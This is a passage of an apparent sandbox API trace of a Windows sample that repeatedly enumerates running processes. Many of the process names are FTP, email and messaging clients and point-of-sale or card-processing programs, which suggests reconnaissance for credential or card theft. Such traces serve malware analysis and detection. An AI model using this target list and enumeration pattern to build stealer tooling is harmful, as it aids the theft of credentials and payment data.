th32ProcessID=0x10bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0185.863] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0185.866] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0185.868] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0185.870] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0185.872] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0185.874] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0185.876] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0185.878] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0185.880] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x112c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0185.881] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1134, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0185.883] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x113c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0185.885] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0185.887] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x114c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0185.889] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1154, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0185.891] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x115c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0185.893] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1164, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0185.895] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x116c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0185.936] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1174, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0185.938] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x117c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0185.939] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0185.941] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x118c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0185.944] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1194, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0185.946] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x119c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0185.948] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0185.949] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0185.951] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0185.954] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0185.956] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0185.958] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0185.960] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0185.962] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0185.964] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0185.966] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0185.968] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0185.970] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1234, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0185.971] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1244, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="society-position-myself.exe")) returned 1 [0186.325] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x124c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="heavy.exe")) returned 1 [0186.328] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="mayvarious.exe")) returned 1 [0186.331] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1338, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0186.333] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1394, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0xa1c, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0186.335] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x60, pcPriClassBase=6, dwFlags=0x0, szExeFile="msfeedssync.exe")) returned 1 [0186.338] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0186.341] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x37c, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0186.343] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="9DC0.exe")) returned 1 [0186.346] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x778, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x6d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0186.348] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x610, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x60, pcPriClassBase=6, dwFlags=0x0, szExeFile="bcatcih")) returned 1 [0186.351] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdd8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x6d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="powershell.exe")) returned 1 [0186.353] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x79c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0xdd8, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0186.355] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0186.368] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 0 [0186.380] CloseHandle (hObject=0x17ec) returned 1 [0186.380] Sleep (dwMilliseconds=0x64) [0186.413] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17ec [0186.429] Process32First (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0186.431] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x71, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0186.432] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x130, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0186.434] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0186.436] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0186.438] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0186.439] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x200, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0186.441] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x218, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0186.483] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x220, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0186.485] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x278, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2c, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0186.486] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0186.492] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x32c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x200, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0186.494] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0186.495] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x37c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0186.497] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x38c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0186.499] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0186.503] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0186.504] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4d, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0186.506] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x468, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0186.508] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0186.510] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x568, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0186.512] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x640, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x33, th32ParentProcessID=0x620, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0186.514] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x674, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0186.516] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0186.517] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0186.519] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x558, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0186.565] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x824, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x21, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SkypeHost.exe")) returned 1 [0186.568] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x884, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0186.569] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x8f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0186.571] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa74, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0186.572] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0186.574] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, 